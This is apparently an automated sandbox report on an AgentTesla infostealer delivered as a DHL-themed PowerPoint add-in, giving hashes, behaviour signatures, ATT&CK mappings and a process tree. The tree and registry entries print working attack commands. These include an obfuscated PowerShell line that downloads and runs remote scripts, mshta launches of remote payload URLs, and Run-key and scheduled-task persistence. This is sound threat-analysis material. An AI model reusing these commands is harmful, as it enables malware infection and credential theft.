agenttesla | 6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674

General

Target

DHL Consignment Details.ppam
Size

8KB
MD5

e49c885d3236afa32adef83e8a201573
SHA1

f8e63da458adee3ece85529ddeba477a07087430
SHA256

6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674
SHA512

7339c4c43193686e737c6c4dbfcaf7778195e2c51d057436426651c1a62375196f393b69e6abcffa1ca2fc75c4117fb719b5b51b3eb4bd4335c85a8d08f0e3ff

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3904	1844	mshta.exe	POWERPNT.EXE

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1612-322-0x000000000043751E-mapping.dmp	family_agenttesla
behavioral2/memory/3832-390-0x000000000043751E-mapping.dmp	family_agenttesla
behavioral2/memory/3832-396-0x00000000054D0000-0x00000000059CE000-memory.dmp	family_agenttesla

Blocklisted process makes network request 11 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
34	3904	mshta.exe
37	3904	mshta.exe
39	3904	mshta.exe
42	3904	mshta.exe
44	3904	mshta.exe
46	3904	mshta.exe
47	3904	mshta.exe
49	3904	mshta.exe
51	3904	mshta.exe
52	3904	mshta.exe
54	1564	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

jsc.exeRegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exejsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1564 set thread context of 1612	1564	powershell.exe	jsc.exe
PID 1564 set thread context of 3832	1564	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2692 schtasks.exe

pid	process
2692	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3784 taskkill.exe
2112 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

1844 POWERPNT.EXE

pid	process
3784	taskkill.exe
2112	taskkill.exe

pid	process
1844	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

dw20.exepowershell.exejsc.exeRegAsm.exe

pid	process
992	dw20.exe
992	dw20.exe
1564	powershell.exe
1564	powershell.exe
1564	powershell.exe
1564	powershell.exe
1564	powershell.exe
1612	jsc.exe
1612	jsc.exe
3832	RegAsm.exe
3832	RegAsm.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

3832 RegAsm.exe

pid	process
3832	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	3784	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	1612	jsc.exe
Token: SeDebugPrivilege	3832	RegAsm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

POWERPNT.EXE

pid process

1844 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEjsc.exeRegAsm.exe

pid process

1844 POWERPNT.EXE
1844 POWERPNT.EXE
1844 POWERPNT.EXE
1612 jsc.exe
3832 RegAsm.exe

pid	process
1844	POWERPNT.EXE

pid	process
1844	POWERPNT.EXE
1844	POWERPNT.EXE
1844	POWERPNT.EXE
1612	jsc.exe
3832	RegAsm.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 1844 wrote to memory of 3904	1844	POWERPNT.EXE	mshta.exe
PID 1844 wrote to memory of 3904	1844	POWERPNT.EXE	mshta.exe
PID 3904 wrote to memory of 3784	3904	mshta.exe	taskkill.exe
PID 3904 wrote to memory of 3784	3904	mshta.exe	taskkill.exe
PID 3904 wrote to memory of 2112	3904	mshta.exe	taskkill.exe
PID 3904 wrote to memory of 2112	3904	mshta.exe	taskkill.exe
PID 3904 wrote to memory of 2692	3904	mshta.exe	schtasks.exe
PID 3904 wrote to memory of 2692	3904	mshta.exe	schtasks.exe
PID 3904 wrote to memory of 1564	3904	mshta.exe	powershell.exe
PID 3904 wrote to memory of 1564	3904	mshta.exe	powershell.exe
PID 3904 wrote to memory of 992	3904	mshta.exe	dw20.exe
PID 3904 wrote to memory of 992	3904	mshta.exe	dw20.exe
PID 1564 wrote to memory of 2292	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 2292	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 2292	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 1612	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 1612	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 1612	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 1612	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 1612	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 1612	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 1612	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 1612	1564	powershell.exe	jsc.exe
PID 1564 wrote to memory of 1352	1564	powershell.exe	csc.exe
PID 1564 wrote to memory of 1352	1564	powershell.exe	csc.exe
PID 1352 wrote to memory of 2856	1352	csc.exe	cvtres.exe
PID 1352 wrote to memory of 2856	1352	csc.exe	cvtres.exe
PID 1564 wrote to memory of 3832	1564	powershell.exe	RegAsm.exe
PID 1564 wrote to memory of 3832	1564	powershell.exe	RegAsm.exe
PID 1564 wrote to memory of 3832	1564	powershell.exe	RegAsm.exe
PID 1564 wrote to memory of 3832	1564	powershell.exe	RegAsm.exe
PID 1564 wrote to memory of 3832	1564	powershell.exe	RegAsm.exe
PID 1564 wrote to memory of 3832	1564	powershell.exe	RegAsm.exe
PID 1564 wrote to memory of 3832	1564	powershell.exe	RegAsm.exe
PID 1564 wrote to memory of 3832	1564	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DHL Consignment Details.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdwdmlrufhjwijjd
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
PID:2292

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1612

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9D4.tmp" "c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\CSC6A455C18B864498D83A45AECC44FA67B.TMP"
5⤵
PID:2856

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:3832

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/12.html\""
3⤵
- Creates scheduled task(s)
PID:2692

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2708
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:992

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Data from Local System

3

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESE9D4.tmp
MD5
5c0ab55e200962088c5f46b2a9b8c7b6

SHA1
775538ecbdf06cf3df25e02e90176c7630feb331

SHA256
6a195a29c5e44a0c369bcb68c4439c65e4641dcd3207df1e8bd2e1521efea0bd

SHA512
1654dd1268543013181b0658871fd4de13eb4fcd7c8141c473cbe97bba00e914c33033d225dc8b8f1b596efd8b5dbb872fb3ae6a3456144134b4eb9df13d9fca

Download Submit
C:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.dll
MD5
84b21bef1f0eaa8ef419f7fd29b95991

SHA1
526ca3d99c9577be0566408645f798a601d0773c

SHA256
08d50541a45d8705e4ce668f0d4581e5ddbd78dd74634b4dc31e74d10f8fb360

SHA512
7ec28a6834b91ad115097fd5b7ac222ba25682883f26b376449c52700eb18bcf99f4158e0cf4410c86bef662847a05d4ec464e0a400bf0609673db5260172c47

Download Submit
C:\Windows\system32\drivers\etc\hosts
MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\CSC6A455C18B864498D83A45AECC44FA67B.TMP
MD5
57733ef912bb130d08e425db233b479b

SHA1
34034a542a37118785c9cf076e60d7350475b01a

SHA256
0975a45dd14354e5aafe0646bc521141f66d3f3691d0736ff541e0a0967e50f1

SHA512
b7587345487ae4a6555050f5ef054df6d5d79b2493a332078392632f9f68448a0c32cc184af03101bb9d1a45c1740a27d20ec5978099008d973a3dfd8e3d16fe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.0.cs
MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.cmdline
MD5
5286688547aeb5b1a5efc76a85af07fa

SHA1
065b6d02946d979bd186abf5b266cd38f1e271b0

SHA256
31b42e2de2a5e9a2f7a7d255b9ce603ac7a50bddee4332a68b6c7e643970078e

SHA512
dfd2e101f6ffee2975c40d2e093722c06536093d131917a0e4b60000a1f2bb9c3a66ed25e483c83808274fc72210860bbe9fcac87c4f375f8ec56ee89fe525d7

Download Submit
memory/992-298-0x0000000000000000-mapping.dmp

Download
memory/1352-381-0x0000000000000000-mapping.dmp

Download
memory/1564-312-0x0000022044253000-0x0000022044255000-memory.dmp

Filesize
8KB

Download
memory/1564-311-0x0000022044250000-0x0000022044252000-memory.dmp

Filesize
8KB

Download
memory/1564-297-0x0000000000000000-mapping.dmp

Download
memory/1564-317-0x0000022044256000-0x0000022044258000-memory.dmp

Filesize
8KB

Download
memory/1612-405-0x0000000005821000-0x0000000005822000-memory.dmp

Filesize
4KB

Download
memory/1612-380-0x0000000005820000-0x0000000005821000-memory.dmp

Filesize
4KB

Download
memory/1612-322-0x000000000043751E-mapping.dmp

Download
memory/1844-246-0x000001FC6B840000-0x000001FC6B844000-memory.dmp

Filesize
16KB

Download
memory/1844-119-0x000001FC5C160000-0x000001FC5C162000-memory.dmp

Filesize
8KB

Download
memory/1844-116-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp

Filesize
64KB

Download
memory/1844-117-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp

Filesize
64KB

Download
memory/1844-118-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp

Filesize
64KB

Download
memory/1844-127-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp

Filesize
64KB

Download
memory/1844-121-0x000001FC5C160000-0x000001FC5C162000-memory.dmp

Filesize
8KB

Download
memory/1844-120-0x000001FC5C160000-0x000001FC5C162000-memory.dmp

Filesize
8KB

Download
memory/1844-115-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp

Filesize
64KB

Download
memory/2112-295-0x0000000000000000-mapping.dmp

Download
memory/2692-296-0x0000000000000000-mapping.dmp

Download
memory/2856-384-0x0000000000000000-mapping.dmp

Download
memory/3784-294-0x0000000000000000-mapping.dmp

Download
memory/3832-390-0x000000000043751E-mapping.dmp

Download
memory/3832-396-0x00000000054D0000-0x00000000059CE000-memory.dmp

Filesize
5.0MB

Download
memory/3832-407-0x00000000054D0000-0x00000000059CE000-memory.dmp

Filesize
5.0MB

Download
memory/3904-261-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads